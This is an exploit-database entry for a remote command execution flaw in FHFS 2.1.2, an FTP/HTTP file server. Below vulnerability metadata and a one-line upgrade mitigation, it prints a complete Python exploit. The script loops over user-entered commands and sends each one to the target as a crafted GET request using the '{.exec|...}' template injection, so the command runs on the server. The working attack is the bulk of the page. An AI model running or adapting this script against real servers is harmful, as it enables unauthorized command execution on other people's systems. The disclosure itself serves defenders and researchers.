FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution

vendor:

FHFS

by:

Naser Farhadi

9,3

CVSS

HIGH

Remote Command Execution

CWE

Product Name: FHFS

Affected Version From: 2.1.2

Affected Version To: 2.1.2

Patch Exists: YES

Related CWE: N/A

CPE: a:fhfs:fhfs

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 SP1 (32 bit)

2015

FHFS – FTP/HTTP File Server 2.1.2 Remote Command Execution

FHFS is a FTP and HTTP Web Server package, transparently based on HFS and FileZilla. A vulnerability exists in FHFS version 2.1.2 which allows an attacker to execute arbitrary commands on the server by sending a specially crafted HTTP request. This can be exploited by sending a GET request with a specially crafted parameter to the vulnerable server.

Mitigation:

Upgrade to the latest version of FHFS.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution
#
# Author: Naser Farhadi
#
# Date: 26 August 2015 # Version: 2.1.2 # Tested on: Windows 7 SP1 (32 bit)
#
# Link : http://sourceforge.net/projects/fhfs/
#
# Description : FHFS is a FTP and HTTP Web Server package,
#               transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website,
#               good for schools, businesses, etc. whose students/employees need to easily transport files. 
# Usage:
#       chmod +x FHFS.py
#       ./FHFS.py
#
# Video: http://youtu.be/ch5A2bQEB0I
##

import socket

url = raw_input("Enter URL : ")
try:
      while True:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((url, 80))
            cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ")
            req = "GET /?{.exec|"+cmd+".}"
            req += " HTTP/1.1\r\n\r\n"
            sock.send(req)
            sock.close()
            print "Done!"
except KeyboardInterrupt:
      print "Bye!"